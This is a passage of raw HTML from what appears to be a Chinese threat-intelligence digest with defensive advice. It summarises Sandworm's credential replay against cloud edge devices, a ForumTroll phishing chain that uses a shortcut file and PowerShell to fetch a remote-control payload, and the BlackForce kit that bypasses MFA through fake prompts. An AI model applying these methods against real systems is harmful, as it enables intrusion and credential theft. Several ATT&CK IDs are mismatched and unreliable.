0px;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;data-mpa-category&#34;:&#34;模板&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template-rows&#34;:&#34;0&#34;,&#34;style&#34;:&#34;width: 100%; padding-left: 0px; padding-right: 0px;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]" data-mpa-action-id="md8j98r2g8u"><div style="display: flex;justify-content: center;align-items: center;width: 100%;" data-mid="" mpa-from-tpl="t"><div style="display: flex;justify-content: flex-start;align-items: center;flex-direction: column;width: 100%;" data-mid="" mpa-from-tpl="t"><div style="align-self: flex-start;padding: 5px 13px;background: white;z-index: 1;display: flex;justify-content: center;align-items: center;margin-left: 25px;margin-bottom: -17.1px;" data-mid="" mpa-from-tpl="t"><div style="text-align: left;margin-right: 5px;margin-top: 5px;" data-mid="" mpa-from-tpl="t"><p style="font-size: 16px;font-family: PingFangSC-Semibold, PingFang SC;font-weight: bold;color: #000000;line-height: 22px;" data-mid=""><span leaf="" mpa-font-style="md8m951ldxp" style="font-size: 32px;" data-mpa-action-id="md8m952lbd3" data-pm-slice="0 0 []"><span textstyle="" style="color: rgb(0, 128, 255);">01</span></span></p></div><p style="width: 81px;height: 4px;align-self: flex-start;" data-mid="" mpa-from-tpl="t" nodeleaf=""><img style="background-color: transparent;" class="rich_pages wxw-img" data-ratio="0.04938271604938271" data-w="162" src="https://wechat2rss.xlab.app/img-proxy/?k=bd4171e4&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FmflphQBJic3STjs5EXib7E8mUTyW8OOibkBv0A2RCNVdryhNX6icoDx1nzX2h4hcMVPMctYfUcqLiaquTwUnRqlJSbg%2F640"/></p></div><div style="width: 100%;padding: 21px 17px;border: 4px solid #517FED;" data-mid="" mpa-from-tpl="t"><div style="text-align: left;" data-mid="" mpa-from-tpl="t"><p style="font-size: 15px;font-family: PingFangSC-Regular, PingFang SC;color: #333333;line-height: 22px;" data-mid=""><span leaf="" mpa-font-style="md8lxf0pxss" style="font-size: 18px;" data-mpa-action-id="md8lxf1q1sip" data-pm-slice="0 0 []"><span textstyle="" style="color: rgb(0, 0, 0);font-weight: bold;">通过配置错误的边缘设备攻击关键组织，非法访问导致凭证泄露或业务中断</span></span></p></div></div></div></div></div></div></div></div></div></div></div></div><ul style="list-style-type: circle;" class="list-paddingleft-1"><li><p style="text-align: left;"><span mpa-font-style="md8j8nugupq" style="font-size: 14px;"><span style="font-weight: bold;"><span leaf="">攻击方式关键词：</span></span></span></p><p style="text-align: left;"><span style="font-size: 14px;text-align: justify;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;background-color: transparent;"><span leaf="">漏洞利用（T1190）、凭证窃取（T1552）、横向移动（T1021）、重放攻击（T1550.004）、网络设备滥用（T1610）、云服务滥用（T1538）、流量分析（T1020）、数据包捕获（T1020.001）、持久化（T1098）</span></span></p></li></ul><ul style="list-style-type: circle;" class="list-paddingleft-1"><li><p><span mpa-font-style="md8j8nug10ts" style="font-size: 14px;"><span leaf=""><span textstyle="" style="color: rgb(0, 82, 255);font-weight: bold;">参考链接：</span></span></span></p><p><span style="background-color: transparent;color: rgb(0, 82, 255);font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 14px;letter-spacing: 0.034em;"><span leaf=""><a href="https://www.darkreading.com/endpoint-security/russian-apt-attacking-critical-orgs-around-world" target="_blank">https://www.darkreading.com/endpoint-security/russian-apt-attacking-critical-orgs-around-world</a></span></span></p></li></ul><p style="text-indent: 2em;margin-top: 16px;text-align: left;"><span leaf="" mpa-font-style="mdigd0bm1wvk" style="font-size: 14px;" data-mpa-action-id="mdigd0c31uc1" data-pm-slice="0 0 []">Sandworm组织长期对多个地区关键组织发起针对性攻击，涉及能源相关及云托管网络基础设施，部分行动与相关组织关联，采用新型攻击策略。攻击者锁定路由器、VPN 集中器等关键网络设备，2021 年起先后利用多款设备及平台的已知漏洞实施攻击，2025 年调整策略，聚焦云服务中错误配置的网络边缘设备，通过数据包捕获、流量分析窃取凭证，再经重放认证实现横向移动，此举降低攻击成本与暴露风险，提升隐蔽性。相关安全团队通过监控异常行为、通知客户及共享情报防御威胁。攻击可能导致关键基础设施非法访问、凭证泄露、横向渗透及服务中断，带来运维与安全隐患。</span></p><p style="margin-top: 16px;text-align: left;"><span leaf="" mpa-font-style="md8j8nug1wkv" style="font-size: 14px;"><span textstyle="" style="font-weight: bold;">防护建议：</span></span></p><p style="margin-top: 0px;text-align: left;"><span leaf="" mpa-font-style="mdigdjvi20or" style="font-size: 14px;" data-mpa-action-id="mdigdjvs190d" data-pm-slice="0 0 []">相关组织开展网络边缘设备安全审计，强化凭证重放攻击检测，监控认证日志，及时修补漏洞，专项加固云托管设备</span></p></div></div></div></div></div><div data-mpa-template="t" mpa-data-temp-power-by="yiban.io" mpa-data-temp-type="body" mpa-from-tpl="t" data-mpa-action-id="md8i1sec1411"><div data-mpa-template="t" mpa-from-tpl="t" style="padding-left: 4px;padding-right: 4px;" data-mpa-action-id="md8ic5yk1nke" data-pm-slice="0 0 []"><div style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" data-mpa-category="模板" mpa-from-tpl="t"><div data-mpa-template-rows="0" style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" mpa-from-tpl="t"><div style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" mpa-from-tpl="t" data-pm-slice="5 3 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-data-temp-power-by&#34;:&#34;yiban.io&#34;,&#34;mpa-data-temp-type&#34;:&#34;body&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;data-mpa-action-id&#34;:&#34;md8i1sec1411&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;style&#34;:&#34;padding-left: 4px; padding-right: 4px;&#34;,&#34;data-mpa-action-id&#34;:&#34;md8ic5yk1nke&#34;,&#34;data-pm-slice&#34;:&#34;0 0 []&#34;,&#34;class&#34;:&#34;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;width: 100%; padding-left: 0px; padding-right: 0px;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;data-mpa-category&#34;:&#34;模板&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template-rows&#34;:&#34;0&#34;,&#34;style&#34;:&#34;width: 100%; padding-left: 0px; padding-right: 0px;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]" data-mpa-action-id="mdigfqighko"><div data-mpa-template="t" mpa-data-temp-power-by="yiban.io" mpa-data-temp-type="body" mpa-from-tpl="t" data-mpa-action-id="md8i1sec1411"><div data-mpa-template="t" mpa-from-tpl="t" style="padding-left: 4px;padding-right: 4px;" data-mpa-action-id="md8ic5yk1nke" data-pm-slice="0 0 []"><div style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" mpa-from-tpl="t" data-pm-slice="5 4 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-data-temp-power-by&#34;:&#34;yiban.io&#34;,&#34;mpa-data-temp-type&#34;:&#34;body&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;data-mpa-action-id&#34;:&#34;md8i1sec1411&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;style&#34;:&#34;padding-left: 4px; padding-right: 4px;&#34;,&#34;data-mpa-action-id&#34;:&#34;md8ic5yk1nke&#34;,&#34;data-pm-slice&#34;:&#34;0 0 []&#34;,&#34;class&#34;:&#34;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;width: 100%; padding-left: 0px; padding-right: 0px;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;data-mpa-category&#34;:&#34;模板&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template-rows&#34;:&#34;0&#34;,&#34;style&#34;:&#34;width: 100%; padding-left: 0px; padding-right: 0px;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]" data-mpa-action-id="md8j98r2g8u"><div style="display: flex;justify-content: center;align-items: center;width: 100%;" data-mid="" mpa-from-tpl="t"><div style="display: flex;justify-content: flex-start;align-items: center;flex-direction: column;width: 100%;" data-mid="" mpa-from-tpl="t"><div style="align-self: flex-start;padding: 5px 13px;background: white;z-index: 1;display: flex;justify-content: center;align-items: center;margin-left: 25px;margin-bottom: -17.1px;" data-mid="" mpa-from-tpl="t"><div style="text-align: left;margin-right: 5px;margin-top: 5px;" data-mid="" mpa-from-tpl="t"><p style="font-size: 16px;font-family: PingFangSC-Semibold, PingFang SC;font-weight: bold;color: #000000;line-height: 22px;" data-mid=""><span leaf="" mpa-font-style="md8ma0u31cup" style="font-size: 32px;" data-mpa-action-id="md8ma0v2rky" data-pm-slice="0 0 []"><span textstyle="" style="color: rgb(0, 128, 255);">02</span></span></p></div><p style="width: 81px;height: 4px;align-self: flex-start;" data-mid="" mpa-from-tpl="t" nodeleaf=""><img style="background-color: transparent;" class="rich_pages wxw-img" data-ratio="0.04938271604938271" data-w="162" src="https://wechat2rss.xlab.app/img-proxy/?k=bd4171e4&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FmflphQBJic3STjs5EXib7E8mUTyW8OOibkBv0A2RCNVdryhNX6icoDx1nzX2h4hcMVPMctYfUcqLiaquTwUnRqlJSbg%2F640"/></p></div><div style="width: 100%;padding: 21px 17px;border: 4px solid #517FED;" data-mid="" mpa-from-tpl="t"><div style="text-align: left;" data-mid="" mpa-from-tpl="t"><p style="font-size: 15px;font-family: PingFangSC-Regular, PingFang SC;color: #333333;line-height: 22px;" data-mid="" data-mpa-action-id="mfag8t7o1pcm" data-pm-slice="0 0 []"><span mpa-font-style="md8lxf0pxss" style="font-size: 18px;" data-mpa-action-id="md8lxf1q1sip" data-pm-slice="0 0 []"><span leaf=""><span textstyle="" style="color: rgb(0, 0, 0);font-weight: bold;">借 Chrome 零日漏洞及社交工程发起新型钓鱼，目标系统遭远程控制且敏感数据外泄</span></span></span></p></div></div></div></div></div></div></div><ul style="list-style-type: circle;" class="list-paddingleft-1"><li><p style="text-align: left;"><span mpa-font-style="md8j8nugupq" style="font-size: 14px;"><span style="font-weight: bold;"><span leaf="">攻击方式关键词：</span></span></span></p><p style="text-align: left;"><span style="background-color: transparent;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 14px;letter-spacing: 0.034em;"><span leaf="">注册恶意域名（T1583.001）、钓鱼邮件（T1566.001）、用户执行（T1204）、恶意代码部署（T1204.002）、反分析（T1027）、代码混淆（T1027.009）、远程控制（T1219）、持久化（T1098）、COM 劫持（T1546.015）、数据窃取（T1081）</span></span></p></li><li><p><span mpa-font-style="md8jbwp71xl3" style="font-size: 14px;"><span leaf=""><span textstyle="" style="color: rgb(0, 82, 255);font-weight: bold;">参考链接：</span></span></span></p><p><span style="background-color: transparent;color: rgb(0, 82, 255);font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 14px;letter-spacing: 0.034em;"><span leaf=""><a href="https://gbhackers.com/forumtrol-operation/" target="_blank">https://gbhackers.com/forumtrol-operation/</a></span></span></p></li></ul><p style="margin-top: 24px;text-indent: 2em;text-align: left;"><span leaf="" mpa-font-style="mdigfqi21vxd" style="font-size: 14px;">近期，ForumTroll 组织通过模拟合法电子图书馆网站及邮件模板，对学术界展开新一轮钓鱼攻击，延续其信息渗透与网络攻击策略。攻击首先通过伪装为eLibrary的钓鱼邮件进行传播，邮件附带个性化命名的恶意附件。攻击者在2025年3月注册恶意域名e-library[.]wiki，意在通过建立可信域名信誉绕过垃圾邮件过滤。受害者点击附件后，恶意快捷方式文件会触发PowerShell脚本，从攻击者服务器下载更多恶意载荷。载荷采用OLLVM-obfuscated技术包装，并利用Tuoni框架实现远程控制，同时通过COM Hijacking确保系统持久性。此次行动相比此前依赖零日漏洞的攻击，社交工程策略有所调整，更多关注目标用户行为与工作流程的分析，以提高攻击成功率。成功的攻击可能导致系统远程控制、敏感数据泄露，且干扰正常工作流程，增加网络安全防护难度。为应对类似威胁。</span></p><p style="margin-top: 16px;text-align: left;"><span mpa-font-style="mdigfqi2x23" style="font-size: 14px;"><span leaf="" style=""><span textstyle="" style="font-weight: bold;">防护建议：</span></span></span></p><p style="margin-top: 0px;text-align: left;"><span mpa-font-style="mdigfqi2x23" style="font-size: 14px;"><span leaf="">加强钓鱼邮件防范培训，强化多因素认证，及时部署系统更新，并监控相关基础设施活动，以便早期发现并遏制攻击。</span></span></p></div></div></div></div></div><div data-mpa-template="t" mpa-data-temp-power-by="yiban.io" mpa-data-temp-type="body" mpa-from-tpl="t" data-mpa-action-id="md8i1sec1411"><div data-mpa-template="t" mpa-from-tpl="t" style="padding-left: 4px;padding-right: 4px;" data-mpa-action-id="md8ic5yk1nke" data-pm-slice="0 0 []"><div style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" data-mpa-category="模板" mpa-from-tpl="t"><div data-mpa-template-rows="0" style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" mpa-from-tpl="t"><div style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" mpa-from-tpl="t" data-pm-slice="5 3 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-data-temp-power-by&#34;:&#34;yiban.io&#34;,&#34;mpa-data-temp-type&#34;:&#34;body&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;data-mpa-action-id&#34;:&#34;md8i1sec1411&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;style&#34;:&#34;padding-left: 4px; padding-right: 4px;&#34;,&#34;data-mpa-action-id&#34;:&#34;md8ic5yk1nke&#34;,&#34;data-pm-slice&#34;:&#34;0 0 []&#34;,&#34;class&#34;:&#34;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;width: 100%; padding-left: 0px; padding-right: 0px;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;data-mpa-category&#34;:&#34;模板&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template-rows&#34;:&#34;0&#34;,&#34;style&#34;:&#34;width: 100%; padding-left: 0px; padding-right: 0px;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]" data-mpa-action-id="mdighks2kof"><div data-mpa-template="t" mpa-data-temp-power-by="yiban.io" mpa-data-temp-type="body" mpa-from-tpl="t" data-mpa-action-id="md8i1sec1411"><div data-mpa-template="t" mpa-from-tpl="t" style="padding-left: 4px;padding-right: 4px;" data-mpa-action-id="md8ic5yk1nke" data-pm-slice="0 0 []"><div style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" mpa-from-tpl="t" data-pm-slice="5 4 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-data-temp-power-by&#34;:&#34;yiban.io&#34;,&#34;mpa-data-temp-type&#34;:&#34;body&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;data-mpa-action-id&#34;:&#34;md8i1sec1411&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;style&#34;:&#34;padding-left: 4px; padding-right: 4px;&#34;,&#34;data-mpa-action-id&#34;:&#34;md8ic5yk1nke&#34;,&#34;data-pm-slice&#34;:&#34;0 0 []&#34;,&#34;class&#34;:&#34;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;width: 100%; padding-left: 0px; padding-right: 0px;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;data-mpa-category&#34;:&#34;模板&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template-rows&#34;:&#34;0&#34;,&#34;style&#34;:&#34;width: 100%; padding-left: 0px; padding-right: 0px;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]" data-mpa-action-id="md8j98r2g8u"><div style="display: flex;justify-content: center;align-items: center;width: 100%;" data-mid="" mpa-from-tpl="t"><div style="display: flex;justify-content: flex-start;align-items: center;flex-direction: column;width: 100%;" data-mid="" mpa-from-tpl="t"><div style="align-self: flex-start;padding: 5px 13px;background: white;z-index: 1;display: flex;justify-content: center;align-items: center;margin-left: 25px;margin-bottom: -17.1px;" data-mid="" mpa-from-tpl="t"><div style="text-align: left;margin-right: 5px;margin-top: 5px;" data-mid="" mpa-from-tpl="t"><p style="font-size: 16px;font-family: PingFangSC-Semibold, PingFang SC;font-weight: bold;color: #000000;line-height: 22px;" data-mid=""><span leaf="" mpa-font-style="md8m9n1h17ag" style="font-size: 32px;" data-mpa-action-id="md8m9n2ku94" data-pm-slice="0 0 []"><span textstyle="" style="color: rgb(0, 128, 255);">03</span></span></p></div><p style="width: 81px;height: 4px;align-self: flex-start;" data-mid="" mpa-from-tpl="t" nodeleaf=""><img style="background-color: transparent;" class="rich_pages wxw-img" data-ratio="0.04938271604938271" data-w="162" src="https://wechat2rss.xlab.app/img-proxy/?k=bd4171e4&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FmflphQBJic3STjs5EXib7E8mUTyW8OOibkBv0A2RCNVdryhNX6icoDx1nzX2h4hcMVPMctYfUcqLiaquTwUnRqlJSbg%2F640"/></p></div><div style="width: 100%;padding: 21px 17px;border: 4px solid #517FED;" data-mid="" mpa-from-tpl="t"><div style="text-align: left;" data-mid="" mpa-from-tpl="t"><p style="font-size: 15px;font-family: PingFangSC-Regular, PingFang SC;color: #333333;line-height: 22px;" data-mid=""><span leaf="" mpa-font-style="md8lxf0pxss" style="font-size: 18px;" data-mpa-action-id="md8lxf1q1sip" data-pm-slice="0 0 []"><span textstyle="" style="color: rgb(0, 0, 0);font-weight: bold;">利用前端代码伪装突破安全，绕过多因素认证窃取企业凭证</span></span></p></div></div></div></div></div></div></div><ul style="list-style-type: circle;" class="list-paddingleft-1"><li><p style="text-align: left;"><span style="font-weight: bold;font-size: 14px;" mpa-font-style="md8jdygzf90"><span leaf="">攻击方式关键词：</span></span></p><p style="text-align: left;"><span style="background-color: transparent;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 14px;letter-spacing: 0.034em;text-align: justify;"><span leaf="">用户执行（T1204）、获取基础设施（T1583）、搜索开放网站/域名（T1593）、钓鱼（T1566）、凭证窃取（T1071）、会话劫持（T1071）、反分析（T1071）、数据窃取（T1071）、绕过安全检测（T1071）</span></span></p></li></ul><ul style="list-style-type: circle;" class="list-paddingleft-1"><li><p style="text-align: left;"><span mpa-font-style="md8jdygzm0s" style="font-size: 14px;"><span leaf=""><span textstyle="" style="color: rgb(0, 82, 255);font-weight: bold;">参考链接：</span></span></span></p><p style="text-align: left;"><span style="background-color: transparent;color: rgb(0, 82, 255);font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 14px;letter-spacing: 0.034em;"><span leaf=""><a href="https://securityonline.info/blackforce-phaas-weaponizes-react-and-stateful-sessions-to-bypass-mfa-steal-credentials/" target="_blank">https://securityonline.info/blackforce-phaas-weaponizes-react-and-stateful-sessions-to-bypass-mfa-steal-credentials/</a></span></span></p></li></ul><p style="margin-top: 24px;text-indent: 2em;text-align: left;"><span leaf="" mpa-font-style="md8jdygzmy1" style="font-size: 14px;">黑力工具包首次出现在2025年8月的电报论坛，售价为200至300欧元，最初用于凭证窃取。该工具迅速发展，从无状态攻击工具升级为具备抗干扰能力的有状态攻击平台。3.x版本采用无状态架构，而4.x和5.x版本则通过利用浏览器的sessionStorage实现数据持久化，确保攻击即使在用户刷新页面后也能持续进行。攻击过程开始于受害者访问钓鱼页面并输入账户信息，攻击者通过命令与控制面板实时收到通知，并动态注入伪造的多因素认证弹窗。当用户输入验证码时，攻击者即时捕获信息，完成会话劫持。该工具伪装成React代码，使其结构合法，难以被静态检测工具发现，并通过“缓存清除”技术规避安全检测。同时，工具包通过严格的过滤机制避免安全厂商和研究人员的干扰，并在后续版本实施“仅限移动设备访问”策略，有效绕过桌面端的安全分析工具。攻击链需要人工操控以确保持续窃取凭证信息，可能导致凭证泄露和会话劫持，进而威胁企业安全。</span></p><p style="margin-top: 16px;text-align: left;"><span leaf="" mpa-font-style="md8jdygz14il" style="font-size: 14px;"><span textstyle="" style="font-weight: bold;">防护建议：</span></span></p><p style="margin-top: 0px;text-align: left;"><span style="font-size: 14px;" mpa-font-style="mdighkrrvpq"><span leaf="">部署零信任架构，加强钓鱼攻击和会话劫持的实时监控，优化多因素认证流程，并提升验证码安全性，确保网络安全防护跟进最新威胁。</span></span></p></div></div></div></div></div><div data-mpa-template="t" mpa-data-temp-power-by="yiban.io" mpa-data-temp-type="body" mpa-from-tpl="t" data-mpa-action-id="md8i1sec1411"><div data-mpa-template="t" mpa-from-tpl="t" style="padding-left: 4px;padding-right: 4px;" data-mpa-action-id="md8ic5yk1nke" data-pm-slice="0 0 []"><div style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" data-mpa-category="模板" mpa-from-tpl="t"><div data-mpa-template-rows="0" style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" mpa-from-tpl="t"><div style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" mpa-from-tpl="t" data-pm-slice="5 3 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-data-temp-power-by&#34;:&#34;yiban.io&#34;,&#34;mpa-data-temp-type&#34;:&#34;body&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;data-mpa-action-id&#34;:&#34;md8i1sec1411&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;style&#34;:&#34;padding-left: 4px; padding-right: 4px;&#34;,&#34;data-mpa-action-id&#34;:&#34;md8ic5yk1nke&#34;,&#34;data-pm-slice&#34;:&#34;0 0 []&#34;,&#34;class&#34;:&#34;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;width: 100%; padding-left: 0px; padding-right: 0px;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;data-mpa-category&#34;:&#34;模板&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template-rows&#34;:&#34;0&#34;,&#34;style&#34;:&#34;width: 100%; padding-left: 0px; padding-right: 0px;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]" data-mpa-action-id="mdigjhd1sw3"><div data-mpa-template="t" mpa-data-temp-power-by="yiban.io" mpa-data-temp-type="body" mpa-from-tpl="t" data-mpa-action-id="md8i1sec1411"><div data-mpa-template="t" mpa-from-tpl="t" style="padding-left: 4px;padding-right: 4px;" data-mpa-action-id="md8ic5yk1nke" data-pm-slice="0 0 []"><div style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" mpa-from-tpl="t" data-pm-slice="5 4 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-data-temp-power-by&#34;:&#34;yiban.io&#34;,&#34;mpa-data-temp-type&#34;:&#34;body&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;data-mpa-action-id&#34;:&#34;md8i1sec1411&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;style&#34;:&#34;padding-left: 4px; padding-right: 4px;&#34;,&#34;data-mpa-action-id&#34;:&#34;md8ic5yk1nke&#34;,&#34;data-pm-slice&#34;:&#34;0 0 []&#34;,&#34;class&#34;:&#34;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;width: 100%; padding-left: 0px; padding-right: 0px;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;data-mpa-category&#34;:&#34;模板&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template-rows&#34;:&#34;0&#34;,&#34;style&#34;:&#34;width: 100%; padding-left: 0px; padding-right: 